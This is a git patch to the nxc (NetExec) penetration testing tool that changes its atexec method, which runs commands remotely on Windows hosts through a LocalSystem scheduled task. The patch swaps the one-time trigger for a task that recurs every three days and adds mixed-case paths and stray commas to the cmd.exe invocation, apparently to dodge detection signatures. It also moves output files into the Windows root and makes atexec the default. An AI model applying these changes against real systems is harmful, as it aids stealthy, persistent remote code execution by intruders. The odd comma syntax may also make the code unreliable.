From 3945b65a825a36aea4cbcc9db39742212c1651a0 Mon Sep 17 00:00:00 2001
From: shivaaz <shivaaz@free.fr>
Date: Mon, 9 Dec 2024 11:45:19 -0500
Subject: [PATCH] customize atexec and make it as default method

---
 nxc/protocols/smb/atexec.py     | 20 ++++++++++++--------
 nxc/protocols/smb/proto_args.py |  2 +-
 2 files changed, 13 insertions(+), 9 deletions(-)

diff --git a/nxc/protocols/smb/atexec.py b/nxc/protocols/smb/atexec.py
index b0ed35b41..d27a834b6 100755
--- a/nxc/protocols/smb/atexec.py
+++ b/nxc/protocols/smb/atexec.py
@@ -72,9 +72,13 @@ def gen_xml(self, command, fileless=False):
         xml = f"""<?xml version="1.0" encoding="UTF-16"?>
 <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
   <Triggers>
-    <RegistrationTrigger>
-      <EndBoundary>{self.get_end_boundary()}</EndBoundary>
-    </RegistrationTrigger>
+    <CalendarTrigger>
+      <StartBoundary>2024-09-29T10:12:18.1178577</StartBoundary>
+      <Enabled>true</Enabled>
+      <ScheduleByDay>
+        <DaysInterval>3</DaysInterval>
+      </ScheduleByDay>
+    </CalendarTrigger>
   </Triggers>
   <Principals>
     <Principal id="LocalSystem">
@@ -102,18 +106,18 @@ def gen_xml(self, command, fileless=False):
   </Settings>
   <Actions Context="LocalSystem">
     <Exec>
-      <Command>cmd.exe</Command>
+      <Command>%WINDIR%\SyStem32\cmd.exe, </Command>
 """
         if self.__retOutput:
-            self.__output_filename = "\\Windows\\Temp\\" + gen_random_string(6)
+            self.__output_filename = "\\WINDOWS\\" + gen_random_string(8)
             if fileless:
                 local_ip = self.__rpctransport.get_socket().getsockname()[0]
-                argument_xml = f"      <Arguments>/C {command} &gt; \\\\{local_ip}\\{self.__share_name}\\{self.__output_filename} 2&gt;&amp;1</Arguments>"
+                argument_xml = f"      <Arguments>/C, {command} &gt; \\\\{local_ip}\\{self.__share_name}\\{self.__output_filename} 2&gt;&amp;1</Arguments>"
             else:
-                argument_xml = f"      <Arguments>/C {command} &gt; {self.__output_filename} 2&gt;&amp;1</Arguments>"
+                argument_xml = f"      <Arguments>/C, {command} &gt; {self.__output_filename} 2&gt;&amp;1</Arguments>"
 
         elif self.__retOutput is False:
-            argument_xml = f"      <Arguments>/C {command}</Arguments>"
+            argument_xml = f"      <Arguments>/C, {command}</Arguments>"
 
         self.logger.debug("Generated argument XML: " + argument_xml)
         xml += argument_xml
diff --git a/nxc/protocols/smb/proto_args.py b/nxc/protocols/smb/proto_args.py
index 5f1875aa7..661ed1562 100644
--- a/nxc/protocols/smb/proto_args.py
+++ b/nxc/protocols/smb/proto_args.py
@@ -71,7 +71,7 @@ def proto_args(parser, parents):
     files_group.add_argument("--append-host", action="store_true", help="append the host to the get-file filename")
 
     cmd_exec_group = smb_parser.add_argument_group("Command Execution", "Options for executing commands")
-    cmd_exec_group.add_argument("--exec-method", choices={"wmiexec", "mmcexec", "smbexec", "atexec"}, default="wmiexec", help="method to execute the command. Ignored if in MSSQL mode", action=DefaultTrackingAction)
+    cmd_exec_group.add_argument("--exec-method", choices={"atexec", "mmcexec", "smbexec", "wmiexec"}, default="atexec", help="method to execute the command. Ignored if in MSSQL mode", action=DefaultTrackingAction)
     cmd_exec_group.add_argument("--dcom-timeout", help="DCOM connection timeout", type=int, default=5)
     cmd_exec_group.add_argument("--get-output-tries", help="Number of times atexec/smbexec/mmcexec tries to get results", type=int, default=10)
     cmd_exec_group.add_argument("--codec", default="utf-8", help="Set encoding used (codec) from the target's output. If errors are detected, run chcp.com at the target & map the result with https://docs.python.org/3/library/codecs.html#standard-encodings and then execute again with --codec and the corresponding codec")